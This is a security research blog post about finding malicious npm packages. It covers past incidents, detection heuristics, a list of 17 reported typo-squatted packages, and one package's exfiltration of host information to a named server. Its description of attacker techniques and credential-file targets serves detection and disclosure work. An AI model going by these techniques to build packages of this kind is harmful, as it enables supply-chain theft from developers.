/sep 4, 2019

Discovering Malicious Packages Published on npm

By Ming Yi Ang

Sightings of malicious packages on popular open source repositories (such as npm and RubyGems) have become increasingly common: just this year, there have been several reported incidents.

This method of attack is frighteningly effective given the widespread reach of popular packages, so we've started looking into ways to discover malicious packages to hopefully preempt such threats.

The problem

In November 2018, a malicious package named “flatmap-stream” was discovered as a transitive dependency of a popular library, “event-stream,” with 1.4 million weekly downloads. Here, the attacker gained publishing rights through social engineering, targeting a package that was not regularly maintained. The attacker published an updated version, “3.3.6,” adding malicious code to steal cryptocurrency. This went undetected for two to three months.

In a separate incident from June 2019, a malicious package “electron-native-notify” was discovered to be stealing sensitive information, such as cryptocurrency wallet seeds and other credentials. The attacker waited for the package to be consumed by another popular library before introducing malicious code into subsequent releases. This was also undetected for two to three months.

Detection of the problem

Malicious packages tend to exhibit a number of common patterns. To understand the common patterns contained in malicious packages, we looked at a past research paper, “Static Detection of Application Backdoors” (), as well as going through publicly reported incidents to come up with the following list.

Obfuscation

Malicious packages tend to hide payloads using encoding methods such as base64 and hex. Such APIs are typically used only by libraries, which implement low-level protocols or provide utility functions, so finding them is a good indicator that a package is malicious.

Reading of sensitive information

Sensitive information is data from the environment, which libraries should only be reading with good reason. This includes files like “/etc/shadow,” “~/.aws/credentials,” or SSH private keys.

Exfiltration of information

Libraries are unlikely to contact hardcoded external servers; this is something more commonly done in downstream applications. Malicious libraries tend to do this to exfiltrate information, so we look for such occurrences.

Remote code execution

A pre-install or post-install script is a convenient way of running arbitrary code on a victim's machine. Payloads may also be downloaded from external sources.

Typo-squatting

While typo-squatted packages are not always malicious, they are a red flag. We deem typo-squatted packages as malicious, since they may provide the exact same functionality and interface, and may update their payload when the package becomes dependent on other popular packages.

Implementation of a detector for malicious packages

To find malicious packages in the wild, we wrote specific, lightweight static analyses for each pattern and ran them over our dataset of npm packages, looking for packages flagged by one or more detectors. False positives were expected; the plan was to narrow the number of candidates to the point where manual verification was feasible.

Two example analyses:

  • To find hardcoded external URLs, we extracted URL-like string literals from the abstract syntax trees of JavaScript source files.
  • To detect typo-squatting, we looked for package names with a maximum Levenshtein distance of 2 between the names of the top 1000 packages, e.g., “mogobd” vs. “mongodb.”

We ran these only on the latest versions of packages.

Results

The full analysis took less than a day and uncovered 17 new malicious packages:

* axioss

* axios-http

* body-parse-xml

* sparkies

* js-regular

* file-logging

* mysql-koa

* import-mysql

* mogodb

* mogobd

* mogoose

* mogodb-core

* node-ftp

* serializes

* serilize

* koa-body-parse

* node-spdy

We disclosed these malicious packages to the npm security team, and they were yanked from the registry.

Most of the malicious packages above hide their payloads as a “test” and use pre-/post-/test-install scripts to exfiltrate information. For example, “node-ftp” exposes the host information of the victim by sending the values of “os.hostname(),” “os.type(),” “os.uptime(),” and “os.tmpdir()” to its server at “arnoxia.cn.”

Disclosure timeline

The disclosure timeline was as follows:

Conclusion

This activity of finding undetected malicious packages has further confirmed our suspicions of the existence of harmful libraries out in the open, and is only the beginning of our quest to efficiently overturn all stones to reduce potential threats. To do this, we intend to perform more regular, automated, and thorough audits on public packages, then generalize these techniques for other package managers like RubyGems.

Related Posts

By Ming Yi Ang

Ming is a security researcher who is passionate about building security automation tools to aid the discovery of various security issues. Through the discovery from the tools, he has since made contributions to various open-source projects by responsibly disclosing the vulnerability findings he encounters from his research.